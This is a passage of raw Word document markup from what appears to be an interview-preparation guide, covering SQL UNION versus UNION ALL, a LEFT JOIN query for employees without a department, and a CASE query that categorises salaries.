    </w:p>
    <w:p w14:paraId="31D209F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1D5DE4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ssume the following data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BCA8B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6759B13A" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34A2A39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5E6BC4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4D7A25E8" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76F0DEC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11A04B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4D999F82" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="620D0D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29CD8C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703C3BAA" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19892AF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3E4175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202B952B" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51C9EF0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AE3CC9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bl>
    <w:p w14:paraId="430658D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373174C8" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="658A9E6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11EC742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59A4D74D" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F59EA5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37808CC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4D4615BC" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E483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108B5B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15F7870D" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14BCB1A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25F729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2F76FB4F" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5404B3A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536D9EE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0293E04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result of the query will be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E10418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25F9365A" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50AE152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416DA25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728C213C" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64A6D9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6FE9AC8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22811BA8" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04E400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39F5B72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5EEF8273" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E0EBB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263BCB3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761DB962" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="256C599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8B580D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r w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="65A154C7" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D5DE4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4619C4D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5C74B18C" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="793E4CF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661C083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057A6BAB" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03CC3A3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4CE197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1F601221" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44812E6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2ADDF0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43A435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l 8 rows from both tables are combined in the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC7FB5" w14:textId="3C3DA3F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3288" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D90974" w14:textId="0CF4702B" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="0025066D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="810" w:name="_Toc197868024"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00701CCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between SQL Union and Union All</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="810"/>
    </w:p>
    <w:p w14:paraId="071C65D8" w14:textId="4EE14449"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677BCFFB"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Removes </w:t>
      </w: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 xml:space="preserve"> from the result set. It only returns unique rows from the combined result of two queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E6B916"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w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Does not remove duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It returns all rows, including duplicates, from the combined result of the two queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15573FD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r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F399D9C"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Since UNION eliminates duplicates, it requires an additional operation to check for and remove duplicate rows. This can result in a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slower performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compared to UNION ALL, especially with large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70603679"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As it doesn't remove duplicates, it is generally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than UNION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3616A0C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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D224CC2"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Use when you need a result set with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique rows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from both queries, without any duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E761E1"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Use when you want to include </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all rows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, including duplicates, in the result set. This is helpful when you want to preserve all the data from the queries as they are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A2BF72"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r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08972F91"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08752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7E839B8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19F290F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09B118F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f TableA and TableB have duplicate values for column1, those duplicates will be removed from the result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18B55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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F2C2F8"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0C2E8C8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0D2924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594289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Even if TableA and TableB have the same values in column1, all the rows will be included, including the duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689680C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3377"/>
        <w:gridCol w:w="4355"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w14:paraId="1E10DAE4" w14:textId="77777777" w:rsidTr="00EF4D87">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70D854C5"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3639060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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44A8E2C8"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w14:paraId="1D06C7AB" w14:textId="77777777" w:rsidTr="00EF4D87">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07AA14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Duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22D5CB4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Removes duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EE4726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ncludes duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w14:paraId="5A1AB5E1" w14:textId="77777777" w:rsidTr="00EF4D87">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2826BF9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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="718FEC5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lower (due to duplicate elimination)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="396B07E5"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aster (does not check for duplicates)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w14:paraId="671E747D" w14:textId="77777777" w:rsidTr="00EF4D87">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DC062D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se case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="689C8D5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unique rows are required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58E8695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all rows, including duplicates, are needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1535906C" w14:textId="58DA1AD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3289" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F313E" w14:textId="491772C3" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00701CCE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="811" w:name="_Toc197868025"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="003A4D1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3A4D19" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- P</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">rint the </w:t>
      </w:r>
      <w:r w:rsidR="00EF4D87"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name which does not have any department</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="811"/>
    </w:p>
    <w:p w14:paraId="0F7BBC1D" w14:textId="473319EC" w:rsidR="00EF4D87" w:rsidRPr="005C1C9E" w:rsidRDefault="00EF4D87"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employees who do not have any department,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join the Employee table with the Department table. Then, filter the results where the department_id is NULL, indicating the employee is not associated with any department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EC6D4B"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for that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4129980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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA572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4EAF453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Department d ON e.department_id = d.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35004AF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RE d.id IS NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6747DD3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AFE3C6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ensures that all employees are included in the result, even if they don't have a matching department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166028D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d.id IS NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This filters out the employees who do not have a department, as their department_id will be NULL when there is no matching record in the Department table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020A94E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This will return the names of employees who are not assigned to any department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFEC56E" w14:textId="715EE6CD"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3290" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9496EF" w14:textId="695FE663" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF4D87">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="812" w:name="_Toc197868026"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SQL Q</w:t>
      </w:r>
      <w:r w:rsidR="00701CCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery - Employee table and add one extra column in output as category? Let's say if salary is in 1 to </w:t>
      </w:r>
      <w:r w:rsidR="00701CCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:tab/>
        <w:t>4000 then Category 1, 4000 - 7000 then category 2, 7000 - 10000 then category 3</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="812"/>
    </w:p>
    <w:p w14:paraId="15F50BC1" w14:textId="1CFD2261" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B80" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To add an extra column called category based on the salary ranges, you can use the CASE statement in SQL. This will allow you to categorize employees based on their salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D09B37"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01DF7E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_id, employee_name, salary,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FEEF6D"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5034134C"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1 AND 4000 THEN 'Category 1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D52E56"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4001 AND 7000 THEN 'Category 2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255F906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7001 AND 10000 THEN 'Category 3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E32ABE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Other Category' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F8E4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category</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5D361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15F04787" w14:textId="77777777" w:rsidR="00310B80" w:rsidRPr="005C1C9E" w:rsidRDefault="00310B8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DF4CA9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w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A conditional statement that allows you to create new categories based on the salary values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D5780"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BETWEEN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to specify the range of values for salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E2B65E"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e category will show the respective category based on the salary range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517B318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employee_id, employee_name, salary, and a new column category based on the defined salary ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E97EF4" w14:textId="615D1C11"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3291" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ECF8E0" w14:textId="4D78C949" w:rsidR="00517925" w:rsidRPr="00CE4B95" w:rsidRDefault="00517925">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="088E112C" w14:textId="3D0C66EC" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="002D75F3" w:rsidP="002D75F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="813" w:name="_Toc197868027"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kafka</w:t>
      </w:r>
      <w:bookmarkEnd w:id="813"/>
    </w:p>
    <w:p w14:paraId="6A0F9E4E" w14:textId="77777777" w:rsidR="006E0265" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0265" w:rsidP="006E0265">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
